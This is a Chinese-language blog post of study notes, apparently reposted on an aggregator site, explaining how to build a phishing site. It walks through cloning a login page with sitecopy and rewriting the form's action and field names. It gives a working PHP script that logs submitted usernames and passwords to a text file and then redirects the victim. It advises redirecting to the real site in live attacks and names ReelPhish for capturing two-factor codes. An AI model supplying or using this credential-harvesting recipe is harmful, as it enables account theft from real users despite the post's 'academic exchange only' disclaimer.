學習記錄-釣魚網站總結
此文章僅用于學術交流

1.釣魚網站基本原理
簡單的講，就是偽裝一個和真實網站相同外表的釣魚網站，讓目標誤以為是真實網站而進行一些敏感操作，如輸入賬號密碼從而被攻擊者非法記錄。

2.釣魚網站演示
步驟很簡單：爬取下載前端代碼-------修改action也就是傳參目的文件-----修改username元素、password元素-----創建本地文件用于接收傳參和記錄敏感信息也就是action需要的目的文件-----跳轉到某頁面提高隱藏性

如百度搜索某后臺登陸頁面

下載前端源碼，右鍵另存為可以下載，也可以使用工具sitecopy

修改action目的文件，這里是創建了一個2.php用于接收，傳參統一修改為user、pass。

創建2.php，代碼如下（這里是post請求，對應前端請求方式，也可能是get）

<?php if (isset($_POST["user"])) { if (isset($_POST["pass"])) { $myfile = fopen("666.txt", "a") or die("Unable to open file!"); $txt = "━━━━賬號=".$_POST["user"]." 密碼=".$_POST["pass"];//$_POST["user"]這個變量的 fwrite($myfile, $txt); fclose($myfile); //在這里他完成寫文件之后進行跳轉 #echo '<script>window.location.href="https://www.baidu.com/"; </script>'; } } ?>

這里需要主要是前端含js代碼需要去看看跳轉關系，這里需要修改跳轉地址，這里為了驗證改了百度，真實場景可以改到對應的真實網站讓它在輸一次。

模擬被攻擊用戶登陸：
訪問釣魚網站–輸入賬號密碼—返回指定頁面
輸入123/123

跳轉到指定網站百度

看看攻擊者后臺已經記錄了賬號密碼，從而釣魚成功

3.總結
1）sitecopy工具：爬蟲工具，可以爬取前端源碼，可批量；
2）雙因素認證：登陸界面一般是含有手機驗證碼、郵箱驗證碼等，這個也可以做的，和上面一樣多寫一個相同的界面然后讓攻擊者輸入驗證碼，不過這個有時效性，所以手動的話需要快速輸入；推薦工具ReelPhish，它的底層原理就是循環去檢查結果，如果有賬號密碼和驗證碼出現，會模擬瀏覽去登陸，這樣就不用人工實時刷新監控。

總結

以上是生活随笔為你收集整理的学习记录-钓鱼网站总结的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。